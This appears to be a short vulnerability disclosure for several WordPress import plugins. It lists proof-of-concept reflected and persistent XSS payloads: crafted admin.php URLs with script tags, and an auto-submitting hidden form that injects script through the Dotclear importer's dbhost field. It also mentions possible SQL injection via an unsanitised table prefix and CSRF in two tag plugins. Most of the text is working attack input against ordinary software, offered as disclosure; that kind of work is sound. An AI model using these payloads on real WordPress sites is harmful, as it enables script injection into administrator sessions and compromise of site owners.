---------------------------------------------------------------------
Blogger: XSS (svn head is vulnerable)

http://localhost/wp/wp-admin/admin.php?import=blogger&authors=2&blog=2'%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E

---------------------------------------------------------------------
Dotclear: persistent XSS and posible Sql Injection (all versions seems to be vulnerable)
Notes: Sql Injection would be possible if the attacker knows the database credentials (dbprefix is not sanitised).

[html]
<form method="post" action="http://localhost/wp/wp-admin/admin.php?import=dotclear&amp;step=1">
	<input type="hidden" name="dbhost" value="&quot;&gt;&lt;script&gt;alert(/XSS/)&lt;/script&gt;" />
</form>
<script type="text/javascript">
    document.forms[0].submit();
</script>
[/html]

---------------------------------------------------------------------
Greymatter: XSS (all versions seems to be vulnerable)

http://localhost/wp/wp-admin/admin.php?import=greymatter&step=1&archivespath=%3Cscript%3Ealert(/XSS/)%3C/script%3E

---------------------------------------------------------------------
Textpattern: persistent XSS and posible Sql Injection (all versions seems to be vulnerable)

Similar PoC of Dotclear

---------------------------------------------------------------------
"Ultimate Tag Warrior" and "Category to tag converter" are vulnerable to CSRF attacks.